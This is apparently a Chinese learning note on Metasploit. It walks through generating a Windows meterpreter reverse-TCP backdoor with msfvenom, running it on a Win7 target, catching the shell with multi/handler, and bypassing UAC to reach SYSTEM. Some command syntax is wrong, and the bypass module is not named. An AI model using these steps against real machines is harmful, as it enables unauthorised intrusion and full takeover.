在学习matesploit的过程,遇到很多问题,一些问题花了好长时间,看了许多的大佬的文章才得到解决,唯恐以后自己忘记,同时希望有遇到同样问题的朋友碰巧看到而得到解决。(大佬搬运工)
1 启动postgresql数据库,然后启动msf
2 制作windows后门payload,msfvenom -p windows/meterpreter/reverse_tcp lhost=本机ip lport=port -f exe >文件名,
在root目录下就可以看到生成的payload文件
3 把生成的payl发送到目标机上(这里是win7)并运行;在Kali上配置反弹shell的payload:
use exploit/multi/hander; set payload windows/meterpreter/reverse_tcp; set lhost=本机ip; set port=port;
启动监听run/exploit;
4 当出现meterpreter时,就表示成功渗透到了目标机,输入getuid查看当前权限,不是system最高权限。渗透的目标当然是获取最高权限,当输入getsystem时,报错:
这表示我们收到了UAC用户账号控制的拦截,可以用meterpreter绕过:
执行run/exploit,成功后,重新用getsystem进行提权:
这样就得到目标机的system权限。